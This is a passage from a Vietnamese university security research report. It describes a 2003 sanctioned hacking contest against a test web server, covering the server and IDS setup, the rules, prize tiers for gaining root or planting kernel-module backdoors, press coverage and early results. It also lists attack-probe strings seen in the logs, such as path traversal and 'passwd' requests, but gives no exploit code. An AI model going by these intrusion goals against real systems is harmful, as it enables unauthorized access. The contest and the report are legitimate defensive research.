thông qua số lượng những tấn công thử nghiệm và các phương thức tấn công khác nhau”. Với một định nghĩa “biện chứng “ như vậy, nhóm đề tài cần xây dựng một máy chủ Web và tìm cách lôi cuốn nhiều nhất có thể được số lượng người thử thách độ an toàn của nó. Trên cơ sở kết quả nhận được, qui trình xây dựng máy chủ Web, kinh nghiệm sau khi bị tấn công sẽ có lợi cho các đơn vị muốn triển khai máy chủ Web. Cuộc thi tìm sơ hở trên máy chủ (bugsearch). Trên cơ sở các kinh nghiệm của nhóm dự án từ đề tài nghiên cứu trọng điểm cấp ĐHQG-HCM về an tòan và bảo mật hệ thống thông tin cùng với những kiến thức mới thu nhận, nhóm dự án đã xây dựng một máy chủ Web với tất cả các kiến thức mà nhóm dự án có được. Máy chủ này sử dụng hệ điều hành (HĐH) Linux, một HĐH có nhiều ưu việt sau: • Chi phí phần cứng và phần mềm rẻ. Linux chạy trên PC có cấu hình trung bình và thấp. Hệ điều hành là hòan tòan miễn phí. Rõ ràng giải pháp máy chủ Linux nằm trong khả năng tài chính của hấu hết các doanh nghiệp vừa và nhỏ. • Hiệu năng máy chủ cao. Là một hệ điều hành Unix, Linux sử dụng rất hiệu quả tài nguyên như bộ nhớ, CPU của hệ thống. Với cấu hình mạnh tới 8 CPU của máy tính kiểu Intel cùng HĐH Linux, doanh nghiệp có thể xây dựng các máy chủ mạnh cấp xí nghiệp, đảm bảo sự họat động của tất cả các dịch vụ Internet, dịch vụ lưu trữ dữ liệu. Như vậy, máy chủ Linux đáp ứng được nhu cầu máy chủ từ nhỏ tới khá lớn với giá thành hợp lý. • HĐH Linux cho phép cấu hình mềm dẻo tối đa. Linux có lẽ là HĐH hiếm mà nhóm dự án có kiến thức và khả năng hiệu chỉnh một cách chi tiết nhất. Nhân (kernel) của máy chủ bugsearch được biên dịch lại hòan tòan từ mã nguồn, được hiệu chỉnh để sao cho khả năng tấn công, chiếm quyền điều khiển và cài đặt cửa sau (backdoor) thấp nhất. • Các phần mềm dịch vụ thực hiện trên HĐH Linux rất phong phú, cho phép triển khai hầu hết các dịch vụ cần thiết trên máy chủ, đáp ứng hầu như tất cả các nhu cầu của các doanh nghiệp. Với những phân tích trên, chúng tôi xây dựng máy chủ Web bugsearch với cấu hình sau: - Hệ điều Linux trên máy tính PC - Dịch vụ Web với Apache server Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 31 - Cơ sở dữ liệu Oracle cho Linux Quá trình tổ chức cuộc thi được tổ chức như sau - Ngày 18 tháng 8 năm 2003, máy chủ bugsearch được triển khai và nối Internet từ phòng máy tính của ĐHQG-HCM tại phòng B103 của ĐH KHXH và Nhân văn. Trong giai đọan này, đường truyền kết nối Internet của ĐHQG-HCM được sử dụng để kết nối với máy chủ bugsearch. Cuộc thi gây được sự chú ý lớn của các cơ quan thông tin đại chúng như báo tuổi trẻ, Sàigòn giải phóng, Thanh niên, VNExpress, Tin tức Việt nam… và hưởng ứng của nhiều hacker trẻ. Cấu hình của hệ thống bugsearch đợt thứ nhất chỉ bao gồm 3 máy là 01 máy chủ Web bugserach, 01 Cisco IDS và 01 máy Linux với phần mềm snort triển khai trên đó. Thông báo về cuộc thi cùng thể lệ cuộc thi được hiển thị tại trang chủ của Website bugsearch Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 32 BẠN LÀ HACKER GIỎI HAY MÁY CHỦ BẢO MẬT TỐT ? Nắm vững các kỹ thuật tấn công một hệ thống là những kiến thức vô cùng quan trọng đối với các quản trị viên, đặc biệt là các chuyên viên về bảo mật hệ thống. Phải đã từng là một quản trị viên hệ thống nhiều máy chủ với các dịch vụ trên đó đang bị xâm nhập ta mới hiểu được cảm giác giận dữ, lo lắng, lúng túng không biết bắt đầu từ đâu và làm như thế nào để lọai bỏ kẻ xâm nhập khỏi hệ thống khi mà ta không có quyền cắt kết nối mạng vì phải đảm bảo liên tục dịch vụ trên đó. Kẻ xâm nhập đã vào qua sơ hở nào ? từ lúc nào ? đã chiếm quyền điều khiển máy chủ nào ? máy chủ nào còn an tòan ? liệu các giải pháp sắp áp dụng đã đủ để lọai trừ kẻ xâm nhập chưa ? … là một lọat các câu hỏi cần có đáp số. Với một hệ thống bắt buộc phải họat động liên tục, người quản trị thực không có nhiều ưu thế so với kẻ xâm nhập, và đây là một cuộc đấu trí thực sự giữa admin và hacker. Để chiến thắng, chúng ta phải có sự chuẩn bị nghiêm túc từ trước cho công tác bảo mật. Đó là hệ thống log, hệ thống cơ sở dữ liệu ghi lại trạng thái của hệ thống khi còn “sạch sẽ”, hệ thống phát hiện xâm nhập … và bên cạnh đó, ta phải là người “trên cơ” đối thủ, hiểu được các ngón nghề của những kẻ xâm nhập như nhữngngười xâm nhập hiểu admin. Với mục đích tạo một sân chơi lành mạnh cho phép các bạn tự đánh giá được khả năng hiểu biết của mình về xâm nhập một hệ thống Unix; kiểm tra khả năng phòng thủ một máy chủ Web, nhóm bugsearch xin tổ chức cuộc thi “Tìm sơ hở (bugsearch)”. Nội dung của cuộc thi là thách đố các bạn xâm nhập một máy chủ Web bugsearch.vnuhcm.edu.vn (203.162.44.80) đặt tại mạng tin học của Đại học Quốc gia Thành phố Hồ chí Minh (ĐHQG-HCM). Tùy theo mức độ xâm nhập thực hiện được mà người xâm nhập sẽ nhận được các giải thưởng khác nhau. Qui chế của cuộc thi “Tìm sơ hở - bug searching”như sau: 1/ Đối tượng tham gia cuộc thi “bugsearch” là tất cả các công dân Việt nam. 2/ Không sử dụng các phương thức tấn công kiểu Deny of Service (DoS) và các biến tấu của nó vì các phương thức này sẽ làm ảnh hưởng tới họat động bình thường của mạng ĐHQG-HCM. 3/ Ban tổ chức cuộc thi sẽ có một số giải thưởng theo thứ tự từ thấp đến cao. Một người chỉ có được một giải ứng với mức độ xâm nhập cao nhất mà họ là người đạt được đầu tiên, trừ giải đặc biệt. Một xâm nhập thành công phải đảm bảo sự hoạt động bình thường của hệ thống, không làm “treo”máy chủ, xóa đĩa cứng... 4/ Mỗi giải thưởng sẽ dành cho một người đầu tiên xâm nhập được mức độ tương ứng, trừ giải đặc biệt. Với 2 điều kiện 3 và 4, nếu một bạn thành công ở mức thứ nhất đầu tiên thì giải thưởng đó thuộc về bạn; tuy nhiên nếu bạn thành công đầu tiên ở mức cao hơn thì giải thưởng mức cao hơn sẽ dành cho bạn và giải thưởng mức thấp hơn mà bạn đã đạt được sẽ dành cho người thứ hai đã đạt được hoặc lại trở thành “mở” để chờ đón các bạn khác. 5/ Trong qúa trình tổ chức cuộc thi, nhóm quản trị máy chủ được quyền thay đổi hệ thống phòng thủ của mình cho phù hợp như trong điều kiện làm việc thực tế. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 33 6/ Để xác nhận thành công của mình, trừ giải đặc biệt, các bạn phải : • Ghi lại tòan bộ các màn hình ghi các lệnh đã thực hiện • Gửi ngay (nếu chậm, có thể có một người khác cũng làm được như bạn) các bằng chứng của cuộc tấn công của mình cho tnminh@vnuhcm.edu.vn. Thời gian nhận được email ghi bởi máy chủ email của ĐHQG sẽ được coi là thời điểm đang ký kết quả dự thi. • Bugsearch sẽ tiến hành kiểm tra (tức là thực hiện lại đúng như các thao tác mà các bạn đã làm, kiểm tra các dấu vết các bạn đã để lại trên hệ thống …) và gửi phúc đáp tới tác giả. Nếu đúng thì sẽ ghi nhận thành công cùng thời điểm thực hiện của bạn. 7/ Cuộc thi bắt đầu từ 12h00 ngày 18/8/2003 và chấm dứt khi tất cả các giải đề ra đã được thực hiện hết hoặc vào thời điểm hội thảo về bảo mật hệ thống vào khỏang giữa tháng 9/2003. Đây cũng là thời điểm trao giải thưởng của cuộc thi. 8/ Tất cả các giải thưởng không bị các hacker lấy sẽ trao cho nhóm chuyên viên tổ chức bảo vệ máy chủ. 9/ Trong trường hợp xảy ra tranh chấp, kết luận của Ban tổ chức giải sẽ là kết luận cuối cùng. Danh sách các giải thưởng: • 1 giải trị giá 500 000 đồng cho ai chiếm được shell quyền một user thông thường trên máy chủ. • 1 giải trị giá 1 triệu đồng cho ai thay được nội dung trang chủ của Webserver này. Redirect truy cập web của một số client qua máy webserver khác không nằm trong phạm vi cuộc thi. • 1 giải trị giá 1 triệu cho ai thay đổi được nội dung tập tin /etc/shadow, nhưng chưa có root shell • 1 giải trị giá 1,5 triệu đồng cho ai kiếm được shell quyền root • 1 giải trị giá 2 triệu đồng cho hacker cài được backdoor dạng Load Kernel Module trên máy chủ • 1 giải đặc biệt trị giá 3 triệu đồng dành cho người cài được backdoor dạng bất kỳ mà nhóm quản trị không phát hiện được ra. Hai ngày trước khi tổ chức hội thảo và kết thúc cuộc thi, nhóm quản trị sẽ cắt server khỏi mạng và thực hiện kiểm tra tòan hệ thống. Vào ngày trao giải, nhóm quản trị sẽ công bố các backdoor hiện đang có trong hệ thống. Giải đặc biệt sẽ trao cho người có backdoor không trong danh sách backdoor mà nhóm quản trị công bố và vẫn đang họat động. Demo sự tồn tại của backdoor sẽ được thực hiện ngay tại hội thảo. Nếu có nhiều người thực hiện được điều này thì giải sẽ được chia đều cho mọi người cùng đạt kết quả trên. Các hacker được quyền thực hiện các kỹ thuật để mình trở thành người duy nhất có backdoor mà quản trị mạng không phát hiện được. Chúc các bạn may mắn. Nhóm bugsearch Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 34 Góp ý - liên hệ: gửi thư tới phanhoaian@tintucvietnam.com, Quảng cáo: sales@tintucvietnam.com.vn © Copyright 2000-2003 TintucVietnam.com, all rights reserved. ® Ghi rõ nguồn "TintucVietnam.com" khi bạn phát hành lại thông tin từ website này. 0.063 s CNTT Việt Nam CNTT Thế giới Nhân vật Điểm báo Radio-Itoday | Diễn đàn | Địa chỉ vàng | Tư vấn kỹ thuật | Văn bản pháp lý | News letter Cuộc thi tài hacker công khai đầu tiên tại Việt Nam (08:43:00 25-08-03) Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 35 Hội thảo - triển lãm Trong nước Ngoài nước Dự án Mua gì - Ở đâu Thị trường PC Công nghệ cho PC Tiện ích cho PC Điện thoại - Viễn thông Rao vặt I-Today - Lần đầu tiên tại Việt Nam, một cuộc thi ''hợp pháp'' thử tài các hacker đã được nhóm ''BugSearch'' thuộc Đại học Quốc gia TP.HCM (ĐHQG-HCM) công bố. Nội dung của cuộc thi là thách đố các hacker xâm nhập một máy chủ Web đặt tại mạng tin học của ĐHQG-HCM. Theo nhóm BugSearch, mục đích của cuộc thi là tạo ra một sân chơi lành mạnh cho phép các bạn yêu thích tin học tự đánh giá được khả năng hiểu biết của mình về xâm nhập một hệ thống Unix; kiểm tra khả năng phòng thủ một máy chủ Web. Trong ''lời dẫn'' của mình, nhóm BugSearch viết: ''Phải đã từng là một quản trị viên hệ thống nhiều máy chủ với các dịch vụ trên đó đang bị xâm nhập, ta mới hiểu được cảm giác giận dữ, lo lắng, lúng túng không biết bắt đầu từ đâu và làm như thế nào để loại bỏ kẻ xâm nhập khỏi hệ thống khi mà ta không có quyền cắt kết nối mạng vì phải đảm bảo liên tục dịch vụ trên đó. Kẻ xâm nhập đã vào qua sơ hở nào? Từ lúc nào? Đã chiếm quyền điều khiển máy chủ nào? Máy chủ nào còn an toàn? Liệu các giải pháp sắp áp dụng đã đủ để loại trừ kẻ xâm nhập? Với một hệ thống bắt buộc phải hoạt động liên tục, người quản trị không có nhiều ưu thế so với kẻ xâm nhập, và đây là một cuộc đấu trí thực sự giữa admin và hacker. Để chiến thắng, chúng ta phải có sự chuẩn bị nghiêm túc từ trước cho công tác bảo mật. Đó là hệ thống log, hệ thống cơ sở dữ liệu ghi lại trạng thái của hệ thống khi còn  sạch sẽ , hệ th ống phát hiện xâm nhập và bên cạnh đó, ta phải là người ''trên cơ'' đối thủ, hiểu được các ngón nghề của những kẻ xâm nhập...'' Quy chế của cuộc thi Theo quy định của nhóm BugSearch, những người tham dự cuộc thi phải tuân thủ các điều kiện sau: 1/ Đối tượng tham gia cuộc thi là tất cả các công dân Việt nam. 2/ Không sử dụng các phương thức tấn công kiểu Từ chối Dịch vụ (DoS) và các biến tấu của nó vì các phương thức này sẽ làm ảnh hưởng tới họat động bình thường của mạng ĐHQG-HCM. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 36 Đào tạo CNTT Virus - hacker Phổ biến kiến thức Mẹo lập trình Thư viện sách Thư viện phần mềm Điểm tin Games Thư viện Games Bên lề Công nghệ 3/ Ban tổ chức cuộc thi sẽ có một số giải thưởng theo thứ tự từ thấp đến cao. Một người chỉ có được một giải ứng với mức độ xâm nhập cao nhất mà họ là người đạt được đầu tiên, trừ giải đặc biệt. Một xâm nhập thành công phải đảm bảo sự hoạt động bình thường của hệ thống, không làm ''treo'' máy chủ, xóa đĩa cứng... 4/ Mỗi giải thưởng sẽ dành cho một người đầu tiên xâm nhập được mức độ tương ứng, trừ giải đặc biệt. Với hai điều kiện 3 và 4, nếu một hacker thành công ở mức thứ nhất đầu tiên thì giải thưởng đó thuộc về anh ta; tuy nhiên nếu anh ta thành công đầu tiên ở mức cao hơn thì giải thưởng mức cao hơn sẽ dành cho anh ta và giải thưởng mức thấp hơn mà anh ta đã đạt được sẽ dành cho người thứ hai đã đạt được hoặc lại trở thành ''mở'' để chờ đón những người khác. 5/ Trong quá trình tổ chức cuộc thi, nhóm quản trị máy chủ được quyền thay đổi hệ thống phòng thủ của mình cho phù hợp như trong điều kiện làm việc thực tế. 6/ Để xác nhận thành công của mình, trừ giải đặc biệt, các hacker phải : - Ghi lại toàn bộ các màn hình ghi các lệnh đã thực hiện - Gửi ngay các bằng chứng của cuộc tấn công của mình cho tnminh@vnuhcm.edu.vn. Thời gian nhận được e-mail ghi bởi máy chủ e-mail của ĐHQG sẽ được coi là thời điểm đang ký kết quả dự thi. - Nhóm BugSearch sẽ tiến hành kiểm tra (tức là thực hiện lại đúng như các thao tác mà các hacker đã làm, kiểm tra các dấu vết các hacker đã để lại trên h ệ thống ) và gửi phúc đáp tới tác giả. Nếu đúng thì sẽ ghi nhận thành công cùng thời điểm thực hiện của hacker đó. 7/ Cuộc thi bắt đầu từ 12h00 ngày 18/8/2003 và chấm dứt khi tất cả các Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 37 PC Cười Tìm chính xác Go Tìm mở rộng giải đề ra đã được thực hiện hết hoặc vào thời điểm hội thảo về bảo mật hệ thống vào khoảng giữa tháng 9/2003. Đây cũng là thời điểm trao giải thưởng của cuộc thi. 8/ Tất cả các giải thưởng không bị các hacker lấy sẽ trao cho nhóm chuyên viên tổ chức bảo vệ máy chủ. 9/ Trong trường hợp xảy ra tranh chấp, kết luận của Ban tổ chức giải sẽ là kết luận cuối cùng. Cơ cấu giải thưởng - 1 giải trị giá 500.000 đồng cho ai chiếm được shell quyền một user thông thường trên máy chủ. - 1 giải trị giá 1 triệu đồng cho ai thay được nội dung trang chủ của Webserver này. Redirect truy cập web của một số client qua máy webserver khác không nằm trong phạm vi cuộc thi. - 1 giải trị giá 1 triệu cho ai thay đổi được nội dung tập tin /etc/shadow, nhưng chưa có root shell - 1 giải trị giá 1,5 triệu đồng cho ai kiếm được shell quyền root - 1 giải trị giá 2 triệu đồng cho hacker cài được backdoor dạng Load Kernel Module trên máy chủ - 1 giải đặc biệt trị giá 3 triệu đồng dành cho người cài được backdoor dạng bất kỳ mà nhóm quản trị không phát hiện được ra. Hai ngày trước khi tổ chức hội thảo và kết thúc cuộc thi, nhóm quản trị sẽ cắt server khỏi mạng và thực hiện kiểm tra toàn hệ thống. Vào ngày trao giải, nhóm quản trị sẽ công bố các backdoor hiện đang có trong hệ thống. Giải đặc biệt sẽ trao cho người có backdoor không trong danh sách backdoor mà nhóm quản trị công bố và vẫn đang họat động. Demo sự tồn tại của backdoor sẽ được thực hiện ngay tại hội thảo. Nếu có nhiều người thực hiện được điều này thì giải sẽ được chia đều cho mọi người cùng đạt kết quả trên. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 38 Các hacker được quyền thực hiện các kỹ thuật để mình trở thành người duy nhất có backdoor mà quản trị mạng không phát hiện được. Đăng Khoa Sobig.F lập kỷ lục về lây nhiễm Microsoft cảnh báo về các lỗ hổng IE nghiêm trọng Sobig.F, biến thể mới nhất của dòng họ Sobig ''Ngựa Tơ roa'' tấn công máy chủ GNU Biến thể MSBlast mới... làm việc thiện? Sâu Blaster đã tràn sang Việt Nam Sâu MSBlaster tấn công Windows, lây lan nhanh chóng Microsoft.com bị ngừng trệ do tấn công DoS Cảnh giác với thủ đoạn ngụy trang của sâu Mimail Các công ty quá chậm trễ trong việc áp dụng các ''miếng vá'' Xem tiếp Bản quyền VASC Orient, Công ty phát triển phần mềm VASC 99 Triệu Việt Vương HN; Tel: (04) 9782235; i-today@vasc.com.vn Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 39 Tuy nhiên, cũng có nhiều nguồn tin cảnh báo khả năng các hacker sẽ tấn công lan sang các máy chủ khác của ĐHQG-HCM mặc dù bugsearch đã được đặt hòan tòan tách biệt với các máy chủ ĐHQG-HCM (đặt tại phòng máy chủ của ĐHQG-HCM tại số 3 Công trường quốc tế và không cùng subnet với bugsearch). Đồng thời, việc quét tìm sơ hở tên máy bugsearch cũng làm ảnh hưởng ít nhiều tới khả năng truy cập của ĐHQG ra Internet (cùng thời điểm này virus tin học lan rất rộng cũng gây nghi ngờ là do cuộc thi bugsearch gây ra). Vì vậy, sau khi tổ chức cuộc thi được một tuần nhóm đề tài đã phải tạm dừng cuộc thi bugsearch vào ngày 25/8/2003. Trong thời gian một tuần diễn ra cuộc thi, chúng tôi ghi nhận được kết quả là đã có 49333 lượt truy cập vào Website bugsearch. Đặc biệt trong đó có tới 5805 lượt truy cập với mục đích tìm các khai thác sơ hở của Web server. Các truy cập này thường có các nội dung “kỳ lạ” như chuỗi dài các ký tự aaaa,xxxx,./././,passwd,cgi-bin, hay chuỗi số nhị phân không hiển thị được trên màn hình - Từ ngày 26/9/2003 đến 17/10/2003 và rồi kéo dài tới 22/10/2003, nhóm dự án lại tiếp tục mở cuộc thi bugsearch với sự tài trợ của Công ty Viễn thông quân đội Vietel, Trung tâm đào tạo SaigonCTT, Cisco Việtnam, HPT. Đây là sự hỗ trợ cụ thể và vô cùng quý báu của các đơn vị để nhóm dự án có thể tiếp tục tổ chức cuộc thi và thử thách cấu hình máy chủ cũng như kiến thức của mình. - Trong lần thử nghiệm thứ hai, nhóm nghiên cứu sử dụng tất cả 10 thiết bị khác nhau bao gồm một router serie 2600, hai switches làm 2 mạng riêng biệt, một máy PC làm Web server (máy này được cài lại mới), một PC với chương trình snort, một Cisco IDS (US$7295), một Sun Enterprise 4500 2 cards mạng với phần mềm ISS, một HP-UX server (của Công ty HPT) làm log server cho Web bugsearch, một máy PC windows XP làm Cisco IDS console và snort monitor, một PC WindowsNT làm ISS console. Các thiết bị này được SaigonCTT và Cisco Việtnam tài trợ miễn phí cho cuộc thi. - Một đường truyền kết nối Internet qua leased line tốc độ 64 Kbps do Vietel tài trợ miễn phí. - Trung tâm SaigonCTT tăng thêm 2 triệu đồng cho giải đặc biệt. - Cấu hình của bugsearch lần thứ 2 được miêu tả theo sơ đồ sau: Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 40 Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 41 Trong sơ đồ này, Cisco router nhận đường truyền E 1 từ Vietel và làm nhiệm vụ sẵn sàng chống lại các cuộc tấn công dạng từ chối dịch vụ (DoS, DDoS). Phương thức cấu hình chi tiết của máy chủ này được miêu tả chi tiết trong phụ lục A. Web server bugsearch nhóm đề tài triển khai Linux kernel 2.4.22 đã biên dịch lại cùng với RedHat Linux 8.0. Hiệu chỉnh lại hệ thống trên Web bugseach để chống lại các cuộc tấn công nhằm lấy quyền kiểm soát máy (root) là công việc trọng tâm của nhóm nghiên cứu. Các phần mềm dịch vụ được triển khai là Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 42 Cơ sở dữ liệu Oracle 8.1.7.0.0 Enterprise Edition for Linux với Patch Set Version 8.1.7.3.0 ; Jakarta Tomcat 4.1.27 cho application server cùng với một ứng dụng ghi nhận đang ký của người sử dụng; Apache 2.0.47 cho Web server; OpenSSH 3.17 để làm việc từ xa; Bind 9.2.1-1.7x cho dịch vụ DNS. Máy HP-UX làm nhiệm vụ lưu log từ bugsearch. Việc triển khai máy log ngòai là để trong trường hợp người tham gia cuộc thi không tôn trọng điều lệ thi xóa đĩa cứng máy chủ thì nhóm đề tài vẫn lưu được họat động của người dự thi. Tiện ích Snort được triển khai trên một máy PC với HĐH Linux; Tiện ích Internet Security System được triển khai trên máy Sun Enterprise 4500 với 3 card mạng Thiết bị Cisco IDS chuyên dụng được kết nối trực tiếp vào mạng. Cả 3 tiện ích IDS đều nhằm mục tiêu phát hiện ra các cuộc tấn công, xâm nhập nhằm vào bugsearch. Thông báo tiếp tục cuộc thi được đang tải trên echip, vnexpress … Nội dung của thông báo nối lại cuộc thi là Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 43 THI TÌM SƠ HỞ “BUGSEARCH” Thân chào các bạn, Được sự ủng hộ của một số đơn vị và cá nhân, chúng tôi vui mừng thông báo tới các bạn rằng cuộc thi “bugsearch” được tiếp tục với một kết nối Internet 64Kbps hoàn toàn dành riêng cho cuộc thi này. Địa chỉ máy chủ đích cần thực hiện xâm nhập là 203.113.143.170. Điều lệ của cuộc thi không có gì thay đổi về căn bản. Chúng tôi chỉ xin được làm rõ hơn một số chi tiết sau: - đây là một họat động nghiên cứu phi lợi nhuận. - hai mục đích chính của cuộc thi là tạo diều kiện cho các bạn quan tâm vấn đề bảo mật hệ thống có được một sân chơi lành mạnh và thử nghiệm khả năng chống lại các cuộc xâm nhập một phương thức cấu hình máy chủ. - sau cuộc thi, cấu trúc toàn bộ hệ thống máy chủ bugsearch và các thiết bị bảo vệ khác cùng tất cả các cấu hình của chúng sẽ được công bố công khai và cung cấp miễn phí cho tất cả những ai quan tâm. - Hệ thống các dịch vụ của máy chủ đích sẽ chỉ được tăng thêm (không giảm đi) trong suốt thời gian cuộc thi. - Nếu một sơ hở của máy chủ do người thi phát hiện và đã thông báo bằng email tới ban tổ chức cuộc thi thì nhóm quản trị máy chủ không được “vá’ lỗi này trong suốt thời gian cuộc thi vì nhóm quản trị chỉ được “vá” các lỗi do tự mình phát hiện ra. Nhóm nghiên cứu xin chân thành cảm ơn các nhà tài trợ và các bạn tham gia cuộc thi này. Chúc các bạn một cuộc thi hào hứng, Nhóm bugsearch Qui chế của cuộc thi “Tìm sơ hở - bugsearch” đã hiệu chỉnh: 1/ Đối tượng tham gia cuộc thi “bugsearch” là tất cả các công dân Việt nam. 2/ Không sử dụng các phương thức tấn công kiểu Deny of Service (DoS) và các biến tấu của nó. 3/ Ban tổ chức cuộc thi sẽ có một số giải thưởng theo thứ tự từ thấp đến cao. Một người chỉ có được một giải ứng với mức độ xâm nhập cao nhất mà họ là người đạt được đầu tiên, trừ giải đặc biệt. Một xâm nhập thành công phải đảm bảo sự hoạt động bình thường của hệ thống, không làm “treo”máy chủ, xóa đĩa cứng... 4/ Mỗi giải thưởng sẽ dành cho một người đầu tiên xâm nhập được mức độ tương ứng, trừ giải đặc biệt. Với hai điều kiện 3 và 4, nếu một bạn thành công ở mức thứ nhất đầu tiên thì giải thưởng đó thuộc về bạn; tuy nhiên nếu bạn thành công đầu tiên ở mức cao hơn thì giải thưởng mức cao hơn sẽ dành cho bạn và giải thưởng mức thấp hơn mà bạn đã đạt được sẽ dành cho người thứ hai đã đạt được hoặc lại trở thành “mở” để chờ đón các bạn khác. 5/ Trong qúa trình tổ chức cuộc thi, nhóm quản trị máy chủ được quyền thay đổi hệ thống phòng thủ của mình cho phù hợp như trong điều kiện làm việc thực tế, nhưng chỉ được “vá” các lỗi do chính mình tìm ra. 6/ Để xác nhận thành công của mình, trừ giải đặc biệt, các bạn phải : Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 44 • Ghi lại tòan bộ các màn hình ghi các lệnh đã thực hiện • Gửi ngay (nếu chậm, có thể có một người khác cũng làm được như bạn) các bằng chứng của cuộc tấn công của mình tới bugsearch@hcm.vnn.vn (hoặc địa chỉ dự phòng bugsearchvn@yahoo.com). Thời gian nhận được email ghi bởi máy chủ email sẽ được coi là thời điểm đang ký kết quả dự thi. • Admin của Bugsearch sẽ tiến hành kiểm tra (tức là thực hiện lại đúng như các thao tác mà các bạn đã làm và/hoặc kiểm tra các dấu vết các bạn đã để lại trên hệ thống …) và gửi phúc đáp tới tác giả. Nếu đúng thì sẽ ghi nhận thành công cùng thời điểm thực hiện của bạn. Nhóm bảo vệ không được quyền “vá” sơ hở mà bạn tìm ra. 7/ Cuộc thi bắt đầu từ 12h00 ngày 26/9/2003 và chấm dứt khi tất cả các giải đề ra đã được thực hiện hết hoặc tới 12h00 ngày 17/10/2003. Thời điểm trao giải thưởng của cuộc thi sẽ cùng với hội thảo về bảo mật hệ thống sẽ được tổ chức sau đó. 8/ Tất cả các giải thưởng không bị các hacker lấy sẽ trao cho nhóm chuyên viên tổ chức bảo vệ máy chủ. 9/ Trong trường hợp xảy ra tranh chấp, kết luận của Ban tổ chức giải sẽ là kết luận cuối cùng. Danh sách các giải thưởng: • 1 giải trị giá 500 000 (năm trăm ngàn) đồng cho ai chiếm được shell quyền một user thông thường trên máy chủ. • 1 giải trị giá 1 (một) triệu đồng cho ai thay được nội dung trang chủ của Webserver này. Redirect truy cập web của một số client qua máy webserver khác không nằm trong phạm vi cuộc thi. • 1 giải trị giá 1 (một) triệu cho ai thay đổi được nội dung tập tin /etc/shadow, nhưng chưa có root shell • 1 giải trị giá 1,5 (một phẩy năm) triệu đồng cho ai kiếm được shell quyền root • 1 giải trị giá 2 (hai) triệu đồng cho hacker cài được backdoor dạng Load Kernel Module trên máy chủ • 1 giải đặc biệt trị giá 5 (năm) triệu đồng dành cho người cài được backdoor dạng bất kỳ mà nhóm quản trị không phát hiện được ra. Hai ngày trước khi tổ chức hội thảo, nhóm quản trị sẽ cắt server khỏi mạng và thực hiện kiểm tra tòan hệ thống. Vào ngày trao giải, nhóm quản trị sẽ công bố các backdoor hiện đang có trong hệ thống. Giải đặc biệt sẽ trao cho người có backdoor không trong danh sách backdoor mà nhóm quản trị công bố và vẫn đang họat động. Demo sự tồn tại của backdoor sẽ được thực hiện ngay tại hội thảo. Nếu có nhiều người thực hiện được điều này thì giải sẽ được chia đều cho mọi người cùng đạt kết quả trên. Các hacker được quyền thực hiện các kỹ thuật để mình trở thành người duy nhất có backdoor mà quản trị mạng không phát hiện được. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 45 MỘT SỐ THAY ĐỔI ĐỐI VỚI THỂ LỆ NỘP BÀI THI TÌM SƠ HỞ “BUGSEARCH” Thân chào các bạn, Nhận được một số phản ánh của một số bạn yêu thích tìm hiểu về bảo mật hệ thống, Ban tổ chức cuộc thi bugsearch xin có một số thay đổi “thoáng hơn” về phương thức nộp bài thi như sau: 1/ Để nộp bài thi, các bạn gửi về ban tổ chức theo địa chỉ bugsearch@hcm.vnn.vn bằng chứng cho phép chứng tỏ việc xâm nhập thành công của các bạn. Hình thức trình bày bằng chứng này hòan tòan theo ý của các bạn và chỉ cần đủ rõ để Ban tổ chức có thể xác định được kết quả, 2/ Các bạn cần cho biết địa chỉ Email để Ban tổ chức có thể gửi Email xác nhận kết quả của bạn và gửi thư mời bạn tới nhận giải. Địa chỉ Email có thể là phương thức duy nhất cho phép Ban tổ chức liên hệ tới các bạn nếu các bạn muốn, 3/ Các bạn có thể ủy quyền cho người khác nhận giải hoặc đề nghị phương án chuyển giải thưởng tới tay các bạn, Để tạo điều kiện cho nhiều người tham gia, chúng tôi sẽ gia hạn cuộc thi tới 18h00 ngày 22/10/2003. Chúc các bạn một cuộc thi hào hứng và thành công, Nhóm bugsearch “VỀ ĐÍCH” TÌM SƠ HỞ “BUGSEARCH” Thân chào các bạn, Chúng tôi đã nhận được một số emailcủa các bạn tham gia cuộc thi bugsearch thông báo về sơ hở dẫn đến cơ sở dữ liệu các tài khoản đăng ký trong bugsearch bị thay đổi. Danh sách các bạn tìm được sơ hở này là : Tên/nickname Email address Thời gian Quang Huy Date: Thu, 16 Oct 2003 00:21:46 -0700 (PDT) !!! Yeu Tram !!! Thu, 16 Oct 2003 01:48:37 -0700 (PDT) "::: PTV5 Website :::" Date: Thu, 16 Oct 2003 20:38:39 -0700 (PDT) Huynh Quoc Khanh" <huynh.quoc.khanh@quantic.com.vn > Date: Sat, 18 Oct 2003 10:13:56 +0700 Tuy đây chưa phải là trang chủ bị thay đổi, nhưng chúng tôi công nhận là các bạn đã có khả năng thay đổi một nội dung quan trọng của Website bugsearch và bạn Quang Huy là người đoạt giải thay đổi nội dung Website trị giá 1 (một) triệu đồng. Nhắc lại theo thể lệ Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 46 cuộc thi, nếu Quang Huy xâm nhập được sâu hơn vào hệ thống thì giải này sẽ dành cho người thứ hai và v.v. Để xem xét khả năng chống lại mất hòan tòan quyền kiểm soát máy 